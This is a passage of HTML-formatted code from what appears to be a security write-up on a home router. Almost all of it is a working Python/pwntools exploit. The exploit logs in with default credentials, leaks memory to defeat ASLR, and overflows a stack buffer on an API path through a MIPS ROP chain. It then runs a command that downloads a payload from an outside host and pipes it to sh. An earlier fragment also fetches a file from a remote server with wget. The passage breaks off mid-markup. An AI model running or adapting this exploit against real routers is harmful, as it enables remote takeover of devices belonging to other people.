class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-19\"><span class=\"crayon-e\">wget <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/$remoteServer\/leak_sip.htm<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-21\"><span class=\"crayon-p\"># restart server<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46ca7961153061-22\"><span class=\"crayon-e\">killall <\/span><span class=\"crayon-e\">arc_httpd<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46ca7961153061-23\"><span class=\"crayon-i\">sleep<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arc_httpd<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0025 seconds] -->  <\/p>\n<p><u>exploit<\/u><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a4d56ec46cab185395022\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> from pwn import *  import hexdump  import urllib  import requests    import socket    context.endian = &#8216;big&#8217;  context.arch = &#8216;mips&#8217;    # Command to execute  cmd = &#8220;wget${IFS}-O${IFS}-${IFS}http:\/\/192.168.1.63:8000\/pwn|sh&#8221;  routerIP = &#8220;192.168.1.1&#8221;  routerPort = 80    def autoconnect():  \ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  \ts.connect((routerIP, routerPort))  \treturn s      ########################################################  # Log In (using default usr and pass&#8230;) and get PI and cfgId  ########################################################    # 1. Log In  s = autoconnect()  s.sendall(&#8221;&#8217;POST \/login.cgi HTTP\/1.1  Host: 192.168.1.1  Proxy-Connection: keep-alive  Content-Length: 29  Origin: http:\/\/192.168.1.1  User-Agent: A  Content-Type: text\/plain;charset=UTF-8  Accept: *\/*  Referer: http:\/\/192.168.1.1\/top.htm  Accept-Encoding: gzip, deflate  Accept-Language: es,en;q=0.8,gl;q=0.6  Cookie: menu_sel=0; menu_adv=0; defpg=status%2Ehtm; urn=    GO=&amp;usr=ApiUsr&amp;pws=ApiUsrPass&#8221;&#8217;)    s.close()    # Get URN (necessary cookie)  r = requests.get(&#8220;http:\/\/&#8221;+ routerIP +&#8221;:&#8221;+ str(routerPort) +&#8221;\/status.htm&#8221;)  r = r.text  URN = re.search(&#8220;new_urn = &#8216;([a-zA-Z0-9]+)'&#8221;, r).group(1)  print &#8220;[+] URN:&#8221;, URN    print &#8220;[+] Logged in&#8221;  raw_input(&#8220;Are you sure you want to continue? Press Enter to continue.&#8221;)  print &#8220;[+] Getting PI and cfgId&#8230;&#8221;    # 2. get PI  r = requests.get(&#8220;http:\/\/&#8221;+ routerIP +&#8221;\/cgi\/renewPi.js&#8221;, cookies={&#8220;urn&#8221;:URN})  r = r.text  pi = r  print &#8220;[+] PI: &#8220;, pi    # 3. get cfgId  r = requests.get(&#8220;http:\/\/&#8221;+ routerIP +&#8221;:&#8221;+ str(routerPort) +&#8221;\/cgi\/cgi_sys_smtp.js&#8221;, cookies={&#8220;urn&#8221;:URN})  r = r.text  cfgId = r[r.find(&#8220;to&#8221;,&#8221;)+4:]  cfgId = cfgId[0:cfgId.find(&#8220;,&#8221;)]  # s.close()  print &#8220;[+] cfgId: &#8220;, cfgId    ########################################################  # Exploit memory leak on email out-of-bound copy on strncpy; which uses Content-Length  ########################################################  i = 1  dd = &#8220;A&#8221;  padding = &#8220;A&#8221;*i  print &#8220;[+] Trying with&#8221;, i, &#8220;bytes of padding..&#8221;  r = requests.Request(&#8216;POST&#8217;,&#8217;http:\/\/&#8217;+ routerIP +&#8217;:&#8217;+ str(routerPort) +&#8217;\/apply.cgi&#8217;, data=&#8217;pi=&#8217;+ pi +&#8217;&amp;&#8217;+ padding +&#8217;&amp;SET0=&#8217;+ cfgId +&#8217;%3D&#8217;+ dd, cookies={&#8220;urn&#8221;:URN})  r = r.prepare()  r.headers[&#8216;Content-Length&#8217;] = i + 90  sess = requests.Session()  sess.send(r)    print &#8220;[+] Memory leak exploited&#8221;    #######################################################  # Get the leaked memory address  ########################################################  r = requests.get(&#8220;http:\/\/&#8221;+ routerIP +&#8221;:&#8221;+ str(routerPort) +&#8221;\/cgi\/cgi_sys_smtp.js&#8221;, stream=True, cookies={&#8220;urn&#8221;:URN})  r = urllib.unquote(r.raw.data)  r = r[r.rfind(&#8220;sendto = &#8220;A&#8221;)+12:]  hexdump.hexdump(r)    # Check if the address we leaked is the address we need to calculate offsets  if r.rfind(&#8220;xd8&#8221;) &gt;= 0 and (r.rfind(&#8220;x77&#8221;) &gt;= 0 or r.rfind(&#8220;x76&#8221;) &gt;= 0):  \t# the end of the address must be 0xdc and the start 0x77 or 0x76  \taddressFound = True  \tend_leak = r.rfind(&#8220;xd8&#8221;)  elif r.rfind(&#8220;xf0&#8221;) &gt;= 0 and (r.rfind(&#8220;x77&#8221;) &gt;= 0 or r.rfind(&#8220;x76&#8221;) &gt;= 0):  \t# the end of the address must be 0xdc and the start 0x77 or 0x76  \taddressFound = True  \tend_leak = r.rfind(&#8220;xf0&#8221;)  else:  \tprint &#8220;[-] Bad leaked address.&#8221;  \tprint &#8220;[-] Restart your router and retry. DO NOT ENTER TO YOUR ROUTER WEBSITE BEFORE RUNNING ME!&#8221;  \texit(1)    LEAKED_ADDRESS = (r[end_leak-3:end_leak+1]).encode(&#8216;hex&#8217;)  LEAKED_ADDRESS_LAST_BYTE = int(&#8216;0x&#8217;+(r[end_leak-1:end_leak+1]).encode(&#8216;hex&#8217;)[1:], 16)  LEAKED_ADDRESS = int(LEAKED_ADDRESS, 16)  print &#8220;[+] Leaked address: &#8220;, hex(LEAKED_ADDRESS), hex(LEAKED_ADDRESS_LAST_BYTE)    ########################################################  # Exploit Stack Buffer overflow on API path  ########################################################  LIBC = LEAKED_ADDRESS &#8211; (0x2C000 + LEAKED_ADDRESS_LAST_BYTE) #0x2C5D8 # 0x773DC # 0x774EC  EXEC = LIBC + 0x00058830  EXEC_COMM = LIBC + 0x00023fac # it is a function like &#8220;system&#8221; :)  print &#8220;[+] LIBC address: &#8220;, hex(LIBC)    if hex(LIBC)[-2:] != &#8217;00&#8217;:  \t# LIBC base must end with 00  \tprint &#8220;[-] Bad LIBC address.&#8221;  \tprint &#8220;[-] Restart your router and retry. DO NOT ENTER TO YOUR ROUTER WEBSITE BEFORE RUNNING ME!&#8221;  \texit(1)    # 0x00049488: addiu s7, sp, 0x10; move a0, s7; move t9, s0; jalr t9;  ROP1 = LIBC + 0x00049488    payload = &#8216;A&#8217; * 237  payload += p32(EXEC_COMM) # s0  payload += &#8216;s1s1&#8217; # s1  payload += &#8216;s2s2&#8217; # s2  payload += &#8216;s3s3&#8217; # s3  payload += p32(ROP1) # ra pc  payload += &#8216;Z&#8217; * 0x10  payload += cmd + &#8216;;&#8217;    s = autoconnect()  s.sendall(&#8221;&#8217;GET \/API\/Services\/Notifications\/&#8221;&#8217;+ payload +&#8221;&#8217; HTTP\/1.1  Host: 192.168.1.1  Content-Type: application\/json  Accept-Encoding: gzip, deflate  Connection: keep-alive  Proxy-Connection: keep-alive  Accept: *\/*  User-Agent: A  Accept-Language: es-ES;q=1  Authorization: Basic A&#8221;&#8217;)    s.close()    print &#8220;[!] All exploited, the command should have been executed..&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-121\">121<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-122\">122<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-123\">123<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-124\">124<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-125\">125<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-126\">126<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-127\">127<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-128\">128<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-129\">129<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-130\">130<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-131\">131<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-132\">132<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-133\">133<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-134\">134<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-135\">135<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-136\">136<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-137\">137<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-138\">138<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-139\">139<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-140\">140<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-141\">141<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-142\">142<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-143\">143<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-144\">144<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-145\">145<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-146\">146<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-147\">147<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-148\">148<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-149\">149<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a4d56ec46cab185395022-150\">150<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a4d56ec46cab185395022-151\">151<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-1\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">pwn <\/span><span class=\"crayon-e\">import *<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hexdump<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-8\"><span class=\"crayon-v\">context<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">endian<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;big&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-9\"><span class=\"crayon-v\">context<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">arch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;mips&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-11\"><span class=\"crayon-p\"># Command to execute<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-12\"><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;wget${IFS}-O${IFS}-${IFS}http:\/\/192.168.1.63:8000\/pwn|sh&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-13\"><span class=\"crayon-v\">routerIP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;192.168.1.1&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-14\"><span class=\"crayon-v\">routerPort<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a4d56ec46cab185395022-16\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">autoconnect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a4d56ec46cab185395022-17\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AF_INET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SOCK_STREAM<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 